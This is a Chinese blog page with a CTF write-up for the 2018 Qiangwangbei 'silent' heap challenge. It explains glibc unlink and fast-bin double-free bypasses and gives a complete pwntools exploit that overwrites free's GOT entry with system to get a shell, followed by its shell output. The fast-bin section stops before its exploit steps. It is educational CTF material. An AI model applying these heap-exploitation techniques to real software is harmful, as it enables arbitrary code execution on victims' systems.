<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.1.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.1.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.1.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.1.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.1.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.1.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="这个题目是2018强网杯线上赛的题目，题目在这里可以下载。可以使用两种方法来解决，一个是small bin的double free，一个是fast bin的double free。顺便总结一下这两个double free。 unlink操作在前一篇文章里基本介绍了glibc的堆内存管理，但是没有深入分析chunk的释放过程，这里涉及到一个unlink宏，下面将详细说下当free一个chunk的时候">
<meta name="keywords" content="pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="强网杯silent以及double free">
<meta property="og:url" content="http://cqlin1995.github.io/2018/06/25/强网杯silent以及double-free/index.html">
<meta property="og:site_name" content="Pur3uit">
<meta property="og:description" content="这个题目是2018强网杯线上赛的题目，题目在这里可以下载。可以使用两种方法来解决，一个是small bin的double free，一个是fast bin的double free。顺便总结一下这两个double free。 unlink操作在前一篇文章里基本介绍了glibc的堆内存管理，但是没有深入分析chunk的释放过程，这里涉及到一个unlink宏，下面将详细说下当free一个chunk的时候">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://cqlin1995.github.io/2018/06/25/强网杯silent以及double-free/silent1.JPG">
<meta property="og:image" content="http://cqlin1995.github.io/2018/06/25/强网杯silent以及double-free/chunk1.png">
<meta property="og:image" content="http://cqlin1995.github.io/2018/06/25/强网杯silent以及double-free/chunk2.png">
<meta property="og:image" content="http://cqlin1995.github.io/2018/06/25/强网杯silent以及double-free/chunk3.png">
<meta property="og:updated_time" content="2018-06-26T06:00:08.511Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="强网杯silent以及double free">
<meta name="twitter:description" content="这个题目是2018强网杯线上赛的题目，题目在这里可以下载。可以使用两种方法来解决，一个是small bin的double free，一个是fast bin的double free。顺便总结一下这两个double free。 unlink操作在前一篇文章里基本介绍了glibc的堆内存管理，但是没有深入分析chunk的释放过程，这里涉及到一个unlink宏，下面将详细说下当free一个chunk的时候">
<meta name="twitter:image" content="http://cqlin1995.github.io/2018/06/25/强网杯silent以及double-free/silent1.JPG">






  <link rel="canonical" href="http://cqlin1995.github.io/2018/06/25/强网杯silent以及double-free/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>强网杯silent以及double free | Pur3uit</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"> 

<div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Pur3uit</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">The quieter you become, the more you are able to hear!</p>
      
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        
          
  
  <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />首页</a>
</li>

      
        
        
          
  
  <li class="menu-item menu-item-tags menu-item-active">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />标签</a>
</li>

      
        
        
          
  
  <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br />分类</a>
</li>

      
        
        
          
  
  <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />归档</a>
</li>

      

      
    </ul>
  

  

  
</nav>


  



 </div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://cqlin1995.github.io/2018/06/25/强网杯silent以及double-free/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Pur3uit">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Pur3uit">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">强网杯silent以及double free</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-06-25T17:10:49+08:00">2018-06-25</time>
            

            
            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/ctf/" itemprop="url" rel="index"><span itemprop="name">ctf</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>这个题目是2018强网杯线上赛的题目，题目在这里可以<a href="https://github.com/cqlin1995/cqlin1995.github.io/tree/master/2018/06/25/%E5%BC%BA%E7%BD%91%E6%9D%AFsilent%E4%BB%A5%E5%8F%8Adouble-free/silent" target="_blank" rel="noopener">下载</a>。可以使用两种方法来解决，一个是small bin的double free，一个是fast bin的double free。顺便总结一下这两个double free。</p>
<h3 id="unlink操作"><a href="#unlink操作" class="headerlink" title="unlink操作"></a>unlink操作</h3><p>在前一篇文章里基本介绍了glibc的堆内存管理，但是没有深入分析chunk的释放过程，这里涉及到一个unlink宏，下面将详细说下当free一个chunk的时候，glibc具体进行了那些操作。</p>
<blockquote>
<p>1：检查前一个chunk是否是free状态，这里根据被free chunk的size字段的P位进行判断，如果是free状态，则使用unlink宏将前一个free chunk从其对应的bin中取出来，和当前被free的chunk进行合并操作。<br>2：检查后一个chunk是否是free状态，这里根据后一个chunk的后一个chunk的size字段的P位进行判断，对于如何定位到next-next chunk，可以在当前chunk的地址上加上chunk的size进行定位。如果后一个chunk为free，则使用unlink操作，将其从对应bin中取出来，并与前面合并后的chunk进行合并操作。</p>
</blockquote>
<a id="more"></a>
<p><code>这里的前一个chunk和后一个chunk指的是和被free chunk在物理内存相邻的chunk</code><br><code>这里的‘将free chunk从其对应的bin中取出来’指的是删除bin中的这个free chunk记录</code><br>下面我们具体看下unlink操作：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> unlink(AV, P, BK, FD) &#123;                                            \</span></span><br><span class="line">    FD = P-&gt;fd;								      \</span><br><span class="line">    BK = P-&gt;bk;								      \</span><br><span class="line">    <span class="keyword">if</span> (__builtin_expect (FD-&gt;bk != P || BK-&gt;fd != P, <span class="number">0</span>))		      \</span><br><span class="line">      malloc_printerr (check_action, <span class="string">"corrupted double-linked list"</span>, P, AV);  \</span><br><span class="line">    <span class="keyword">else</span> &#123;								      \</span><br><span class="line">        FD-&gt;bk = BK;							      \</span><br><span class="line">        BK-&gt;fd = FD;							      \</span><br><span class="line">        <span class="keyword">if</span> (!in_smallbin_range (chunksize_nomask (P))			      \</span><br><span class="line">            &amp;&amp; __builtin_expect (P-&gt;fd_nextsize != <span class="literal">NULL</span>, <span class="number">0</span>)) &#123;		      \</span><br><span class="line">	    <span class="keyword">if</span> (__builtin_expect (P-&gt;fd_nextsize-&gt;bk_nextsize != P, <span class="number">0</span>)	      \</span><br><span class="line">		|| __builtin_expect (P-&gt;bk_nextsize-&gt;fd_nextsize != P, <span class="number">0</span>))    \</span><br><span class="line">	      malloc_printerr (check_action,				      \</span><br><span class="line">			       <span class="string">"corrupted double-linked list (not small)"</span>,    \</span><br><span class="line">			       P, AV);					      \</span><br><span class="line">            <span class="keyword">if</span> (FD-&gt;fd_nextsize == <span class="literal">NULL</span>) &#123;				      \</span><br><span class="line">                <span class="keyword">if</span> (P-&gt;fd_nextsize == P)				      \</span><br><span class="line">                  FD-&gt;fd_nextsize = FD-&gt;bk_nextsize = FD;		      \</span><br><span class="line">                <span class="keyword">else</span> &#123;							      \</span><br><span class="line">                    FD-&gt;fd_nextsize = P-&gt;fd_nextsize;			      \</span><br><span class="line">                    FD-&gt;bk_nextsize = P-&gt;bk_nextsize;			      \</span><br><span class="line">                    P-&gt;fd_nextsize-&gt;bk_nextsize = FD;			      \</span><br><span class="line">                    P-&gt;bk_nextsize-&gt;fd_nextsize = FD;			      \</span><br><span class="line">                  &#125;							      \</span><br><span class="line">              &#125; <span class="keyword">else</span> &#123;							      \</span><br><span class="line">                P-&gt;fd_nextsize-&gt;bk_nextsize = P-&gt;bk_nextsize;		      \</span><br><span class="line">                P-&gt;bk_nextsize-&gt;fd_nextsize = P-&gt;fd_nextsize;		      \</span><br><span class="line">              &#125;								      \</span><br><span class="line">          &#125;								      \</span><br><span class="line">      &#125;									      \</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>主要关注前8行代码，P就是要被从bin中删除的free chunk记录，这里主要完成的功能就是将P的前一个free chunk的fd字段修改为P的fd字段，将P的后一个free chunk的bk字段修改为P的bk字段。<br><code>这里的前一个和后一个chunk是bin循环双链表中的前一个记录和后一个记录，物理上并不相邻，他们的前后关系是通过fd和bk指针来确定的</code><br>如果我们可以控制P的fd和bk字段，便可以实现任意地址读写。</p>
<h3 id="small-bin的double-free"><a href="#small-bin的double-free" class="headerlink" title="small bin的double free"></a>small bin的double free</h3><p>double free的关键步骤就是利用了unlink宏的操作，但是这里有一个限制，不仅仅需要知道P的值(也就是伪造chunk的地址)，还必须知道P的地址，为什么呢？<br>因为在unlink宏代码的第4行，在进行解链操作之前，进行了一些检验，限制了前一个chunk的fd和后一个chunk的bk必须指向P。所以，当随意修改P的fd和bk之后，由于P的前一个和后一个chunk是由fd和bk确定的，会出现指不回来的情况，导致glibc报错。<br>为了绕过这个检测，必须要知道P的地址，也就是&amp;P，这时便可以通过下面的方法进行绕过：<br><code>FD = P-&gt;fd = &amp;P - 24
BK = P-&gt;bk = &amp;P - 16</code><br>由于C语言结构体指针在取得成员的值时，仅仅以其头指针的地址加上偏移进行寻址<br><code>FD-&gt;bk = *(&amp;P - 24 + 24) = P
BK-&gt;fd = *(&amp;P - 16 + 16) = P</code><br>进行解链操作之后，便有<br><code>FD-&gt;bk = P = &amp;P - 16
BK-&gt;fd = P = &amp;P - 24</code><br>这个时候，P就指向了自身所在位置减去24的地址处，如果可以对P进行一定区间的写入，便可以修改P自身的内容，让其指向任意的地方，这时便可以实现任意地址写。</p>
<h4 id="反编译silent"><a href="#反编译silent" class="headerlink" title="反编译silent"></a>反编译silent</h4><p>首先对silent进行反编译，查看其主要功能和漏洞位置<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">主函数</span><br><span class="line"><span class="keyword">void</span> __fastcall __<span class="function">noreturn <span class="title">main</span><span class="params">(__int64 a1, <span class="keyword">char</span> **a2, <span class="keyword">char</span> **a3)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> v3; <span class="comment">// [sp+4h] [bp-Ch]@2</span></span><br><span class="line">  __int64 v4; <span class="comment">// [sp+8h] [bp-8h]@1</span></span><br><span class="line"></span><br><span class="line">  v4 = *MK_FP(__FS__, <span class="number">40L</span>L);</span><br><span class="line">  sub_40091C();</span><br><span class="line">  sub_4009A4();</span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    __isoc99_scanf(<span class="string">"%d"</span>, &amp;v3);</span><br><span class="line">    getchar();</span><br><span class="line">    <span class="keyword">switch</span> ( v3 )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line">        <span class="keyword">delete</span>();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">3</span>:</span><br><span class="line">        edit();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">1</span>:</span><br><span class="line">        create();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>很简单的逻辑，主函数调用了三个函数，分别进行堆块的创建，编辑和删除。<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">delete</span>函数</span><br><span class="line"><span class="keyword">signed</span> __<span class="function">int64 <span class="title">delete</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">signed</span> __int64 result; <span class="comment">// rax@3</span></span><br><span class="line">  __int64 v1; <span class="comment">// rdx@5</span></span><br><span class="line">  <span class="keyword">int</span> v2; <span class="comment">// [sp+4h] [bp-Ch]@1</span></span><br><span class="line">  __int64 v3; <span class="comment">// [sp+8h] [bp-8h]@1</span></span><br><span class="line"></span><br><span class="line">  v3 = *MK_FP(__FS__, <span class="number">40L</span>L);</span><br><span class="line">  __isoc99_scanf(<span class="string">"%d"</span>, &amp;v2);</span><br><span class="line">  getchar();</span><br><span class="line">  <span class="keyword">if</span> ( v2 &gt;= <span class="number">0</span> &amp;&amp; v2 &lt;= <span class="number">9</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">free</span>((<span class="keyword">void</span> *)s[v2]);</span><br><span class="line">    result = <span class="number">0L</span>L;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    result = <span class="number">0xFFFFFFFF</span>LL;</span><br><span class="line">  &#125;</span><br><span class="line">  v1 = *MK_FP(__FS__, <span class="number">40L</span>L) ^ v3;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>在delete函数当中，对堆块进行free的时候，并未进行相关检查，会造成double free漏洞。<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">create函数</span><br><span class="line">__<span class="function">int64 <span class="title">create</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">size_t</span> size; <span class="comment">// [sp+0h] [bp-20h]@1</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 i; <span class="comment">// [sp+8h] [bp-18h]@1</span></span><br><span class="line">  <span class="keyword">void</span> *v3; <span class="comment">// [sp+10h] [bp-10h]@1</span></span><br><span class="line">  __int64 v4; <span class="comment">// [sp+18h] [bp-8h]@1</span></span><br><span class="line"></span><br><span class="line">  v4 = *MK_FP(__FS__, <span class="number">40L</span>L);</span><br><span class="line">  __isoc99_scanf(<span class="string">"%lu"</span>, &amp;size);</span><br><span class="line">  getchar();</span><br><span class="line">  v3 = <span class="built_in">malloc</span>(size);</span><br><span class="line">  write(v3, size);</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0L</span>L; i &lt;= <span class="number">9</span> &amp;&amp; s[i]; ++i )</span><br><span class="line">    ;</span><br><span class="line">  <span class="keyword">if</span> ( i == <span class="number">10</span> )</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">  s[i] = v3;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0L</span>L;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>在create函数中，可以观察到每一次申请的堆块，其指针都会存储到一个数组s当中，这里便存在上面所说的&amp;P。<br><img src="/2018/06/25/强网杯silent以及double-free/silent1.JPG"></p>
<h4 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h4><p>因此，利用思路就很简单了，下面一步步来进行说明。</p>
<blockquote>
<p>1：首先申请两个大小一样的堆块，这里使用两个256字节大小的堆块</p>
</blockquote>
<img src="/2018/06/25/强网杯silent以及double-free/chunk1.png">
<blockquote>
<p>2：依次释放两个堆块，接着申请一个528字节的堆块，这里的528为两个堆块的大小加上第二个堆块的头部尺寸</p>
</blockquote>
<img src="/2018/06/25/强网杯silent以及double-free/chunk2.png">
<blockquote>
<p>3：在新申请的堆块上伪造两个堆块，位置和最开始申请的两个堆块一致，并设置第一个伪造堆块的fd为<code>0x6020d8-0x18</code>，bk为<code>0x6020d8-0x10</code>。</p>
</blockquote>
<img src="/2018/06/25/强网杯silent以及double-free/chunk3.png">
<blockquote>
<p>4: free伪造的第二个堆块，便会触发第一个伪造堆块的unlink。这时便会将数组s的第四个元素设为<code>0x6020c0</code>，指向了第一个元素。当后续编辑第四个chunk的时候，也就是在编辑数组s。</p>
</blockquote>
<p>exp如下：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">'./silent'</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line">p.sendline(<span class="string">'256'</span>)</span><br><span class="line">p.sendline(<span class="string">'A'</span>*<span class="number">255</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line">p.sendline(<span class="string">'256'</span>)</span><br><span class="line">p.sendline(<span class="string">'B'</span>*<span class="number">255</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line">p.sendline(<span class="string">'256'</span>)</span><br><span class="line">p.sendline(<span class="string">'/bin/sh\x00'</span>+<span class="string">'c'</span>*(<span class="number">255</span><span class="number">-8</span>))</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'2'</span>)</span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line">p.sendline(<span class="string">'2'</span>)</span><br><span class="line">p.sendline(<span class="string">'0'</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line">p.sendline(<span class="string">'528'</span>)</span><br><span class="line">p.sendline(<span class="string">'\x00'</span>*<span class="number">8</span>+p64(<span class="number">0x101</span>)+p64(<span class="number">0x6020d8</span><span class="number">-0x18</span>)+p64(<span class="number">0x6020d8</span><span class="number">-0x10</span>)+<span class="string">'A'</span>*(<span class="number">256</span><span class="number">-32</span>)+p64(<span class="number">0x100</span>)+p64(<span class="number">0x110</span>)+<span class="string">'B'</span>*<span class="number">255</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'2'</span>)</span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#这里对数组s的第四个元素进行编辑，也就是对数组自身进行编辑，将第一个元素改写为free的got地址</span></span><br><span class="line">p.sendline(<span class="string">'3'</span>)</span><br><span class="line">p.sendline(<span class="string">'3'</span>)</span><br><span class="line">p.sendline(<span class="string">'\x18\x20\x60\x00'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#这里对第一个元素进行编辑，也就是对free函数的got表项进行编辑，让它的got表项值为system函数的地址</span></span><br><span class="line">p.sendline(<span class="string">'3'</span>)</span><br><span class="line">p.sendline(<span class="string">'0'</span>)</span><br><span class="line">p.sendline(<span class="string">'\x30\x07\x40\x00\x00\x00'</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'2'</span>)</span><br><span class="line">p.sendline(<span class="string">'2'</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">pur3uit@pur3uit:~/ctf$ python exploit.py </span><br><span class="line">[+] Starting local process &apos;./silent&apos;: pid 5906</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line">cat: banner.txt: No such file or directory</span><br><span class="line">$ ls</span><br><span class="line">core  exploit.py  silent</span><br><span class="line">$ whoami</span><br><span class="line">pur3uit</span><br></pre></td></tr></table></figure>
<p>成功getshell，这里没有开启aslr，所以内存地址都是直接硬编码进去的。</p>
<h3 id="fast-bin的double-free"><a href="#fast-bin的double-free" class="headerlink" title="fast bin的double free"></a>fast bin的double free</h3><p>和small bin不同的是，fast bin的组织方式是单链表，每一次插入free chunk都是在头部插入，删除free chunk都是在头部删除，这个部分在堆管理文章中已经详细说明了。<br>用户申请一个fast chunk时，glibc在将fast bin的头节点返回给用户的同时，会将头节点的fd写入fastbinY数组当中，也就是将fd作为头节点。因此，这里的思路就是，利用double free在fast bin里面形成两个一样的free chunk，当第一次申请之后，在堆块的fd写入自己想要控制的地址，再次申请之后，fastbinY的数组当中就被写入了想要控制的地址。<br>可惜的是，fast bin在glibc 2.19版本之后，引入了一些安全检查。</p>
<h4 id="两个安全检查"><a href="#两个安全检查" class="headerlink" title="两个安全检查"></a>两个安全检查</h4><blockquote>
<p>1：在执行分配操作时, 若块的大小符合Fast bin,则会在对应的bin中寻找是否有合适的块。此时glibc将根据候选块的size域计算出fastbin索引, 然后与对应bin在fastbin中的索引进行比较, 如果二者不匹配, 则说明块的size域遭到了破坏。<br>2：在执行释放操作时, 若块的大小符合Fast bin,则会检查对应的bin中的第一块是否为正在被释放的块, 这可以检测出连续两次释放同一块的问题。</p>
</blockquote>
<h4 id="绕过上述检查"><a href="#绕过上述检查" class="headerlink" title="绕过上述检查"></a>绕过上述检查</h4><p>对于第一个检查而言，为了获得合法的size，在修改堆块fd值的同时，需要保证fd的值加上8的地址处存放的值等于double free操作的chunk尺寸。<br>对于第二个检查而言，只需要在两个free之间free另一个同等大小的fast chunk，因为glibc只检查对应bin的头节点。<br>和small bin一样，最终目的还是需要获得对数组s的控制权，因此需要在数组s附近寻找一个合适的fd值，使其偏移8个字节处的值是一个合适的fastbin尺寸。<br>查看数组s附件的内存情况：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">查看bss段的数据</span><br><span class="line">pwndbg&gt; x/20xg 0x602080</span><br><span class="line">0x602080 &lt;stdout&gt;:	0x00007f30ecd4e600	0x0000000000000000</span><br><span class="line">0x602090 &lt;stdin&gt;:	0x00007f30ecd4d8c0	0x0000000000000000</span><br><span class="line">0x6020a0 &lt;stderr&gt;:	0x00007f30ecd4e520	0x0000000000000000</span><br><span class="line">0x6020b0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x6020c0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x6020d0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x6020e0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x6020f0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x602100:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x602110:	0x0000000000000000	0x0000000000000000</span><br></pre></td></tr></table></figure></p>
<p>0x6020c0地址开始处是数组s，bss段开始位置处有一些初始化的值，可以利用这些值来充当size字段。<br>这里使用stderr地址处的7f作为size字段，它的地址为0x6020a5，减去8得到0x60209d，这个值就是要设置的fd值。</p>
<h4 id="利用过程-1"><a href="#利用过程-1" class="headerlink" title="利用过程"></a>利用过程</h4><blockquote>
